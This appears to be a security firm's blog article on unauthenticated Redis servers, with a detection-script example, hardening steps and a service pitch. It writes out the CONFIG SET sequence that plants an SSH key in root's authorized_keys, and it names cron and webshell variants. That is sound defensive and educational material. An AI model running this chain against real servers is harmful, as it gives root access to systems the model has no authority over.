Valtik Studios
Redis · critical · Updated 2026-04-17 · orig. 2026-01-04 · 9 min

Redis: CONFIG GET requirepass Returns Empty

Redis deployed without authentication is one of the most exploited misconfigurations on the internet. Attackers use CONFIG SET to write SSH keys, webshells, and cron jobs for persistent remote code execution. A penetration testing reference for Redis security hardening and incident response.

Phillip (Tre) Bucchi·Founder, Valtik Studios. Penetration Tester

Founder of Valtik Studios. Penetration tester. Based in Connecticut, serving US mid-market.

Why unauthenticated Redis is still exploitable in 2026

Redis published ACLs in 6.0. That was mid-2020. Redis 7 shipped in 2022. Every Redis instance deployed in the last five years has had user/password/ACL support available out of the box.

We still find unauthenticated Redis every month. Sometimes on misconfigured Kubernetes clusters. Sometimes on legacy VMs that haven't been touched since 2019. Sometimes on cloud instances where someone added a public IP for "quick debugging" and never removed it.

What happens when we find one is straightforward. We pop a shell.

The default configuration

Redis binds to all interfaces (bind 0.0.0.0) and requires no password (requirepass is empty). If port 6379 is reachable, you have full access. The default configuration has no concept of users, roles, or permissions.

What's in a Redis instance

Redis is used as a cache, session store, message broker, and rate limiter. A typical exposed instance contains:

  • Session tokens: full session objects with user IDs, roles, and preferences
  • API cache: cached API responses containing user data
  • Rate limit counters: revealing internal rate limit thresholds
  • Job queues: Sidekiq/Bull/Celery job payloads with function arguments

From cache access to server compromise

Redis supports the CONFIG SET command, which can change server configuration at runtime. The classic attack chain:

  1. CONFIG SET dir /root/.ssh
  2. CONFIG SET dbfilename authorized_keys
  3. SET payload "\nssh-rsa AAAA...your-key...\n"
  4. BGSAVE

This writes your SSH public key into the root user's authorized_keys file. You now have SSH root access to the server.

The same technique works with cron jobs (/var/spool/cron/root) and web shells (/var/www/html/shell.php).

How we detect this

Our scanner:

  1. Connects to port 6379 and sends PING (expects PONG)
  2. Runs INFO server to get version, OS, and configuration
  3. Runs CONFIG GET requirepass to verify no password
  4. Runs DBSIZE and KEYS * (sampled) to assess data exposure
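As an added example (not the scanner's own code), a minimal RESP client that performs steps 1 and 3 of the check above and turns the two replies into a finding. The host and port, the finding labels, and the constructed sample replies are assumptions of this example; the pure functions run offline without a Redis server.

```python
import socket

class RespError(Exception):
    """A RESP error reply such as -NOAUTH or -ERR unknown command."""

def encode_command(*args: str) -> bytes:
    """Encode a command as a RESP array of bulk strings (the wire form redis-cli sends)."""
    parts = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)

def parse_reply(buf: bytes, pos: int = 0):
    """Parse one RESP2 reply at buf[pos:]; return (value, position after it)."""
    kind, end = buf[pos:pos + 1], buf.index(b"\r\n", pos)
    line, nxt = buf[pos + 1:end].decode(), end + 2
    if kind == b"+":
        return line, nxt
    if kind == b"-":
        return RespError(line), nxt
    if kind == b":":
        return int(line), nxt
    if kind == b"$":                      # bulk string; $-1 is a null reply
        n = int(line)
        if n < 0:
            return None, nxt
        if len(buf) < nxt + n + 2:
            raise ValueError("truncated bulk string")
        return buf[nxt:nxt + n].decode(), nxt + n + 2
    if kind == b"*":                      # array, e.g. CONFIG GET's name/value pairs
        items = []
        for _ in range(int(line)):
            item, nxt = parse_reply(buf, nxt)
            items.append(item)
        return items, nxt
    raise ValueError(f"unexpected RESP type byte {kind!r}")

def assess(ping_reply, config_reply) -> str:
    """Classify the PING and CONFIG GET requirepass replies (labels are this example's own)."""
    if isinstance(ping_reply, RespError):
        return "auth-required" if ping_reply.args[0].startswith("NOAUTH") else "error"
    if isinstance(config_reply, RespError):   # CONFIG renamed away or denied by an ACL
        return "open-config-blocked"
    if config_reply == ["requirepass", ""]:
        return "unauthenticated"               # anyone who can reach 6379 has full access
    return "open-password-set"                 # PONG without AUTH yet a password: review ACLs

def check_redis(host: str, port: int = 6379, timeout: float = 3.0) -> str:
    """Live check: one TCP session, both commands pipelined, replies fed to assess()."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(encode_command("PING") + encode_command("CONFIG", "GET", "requirepass"))
        buf = b""
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                raise ConnectionError("server closed the connection before replying")
            buf += chunk
            try:                              # retry until both replies are complete
                ping, pos = parse_reply(buf)
                config, _ = parse_reply(buf, pos)
                return assess(ping, config)
            except (ValueError, IndexError):
                continue
```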

Defense

  • Set a strong password: requirepass your-strong-password-here
  • Bind to localhost only: bind 127.0.0.1
  • Disable dangerous commands: rename-command CONFIG ""
  • Enable TLS (Redis 6+)
  • Use ACLs (Redis 6+) for per-user permissions
Tags: redis, rce, misconfiguration, penetration testing, vulnerability assessment, incident response, cloud security, research

Want us to check your Redis setup?

Our scanner detects this exact misconfiguration, plus dozens more across 38 platforms. Free website check available, no commitment required.
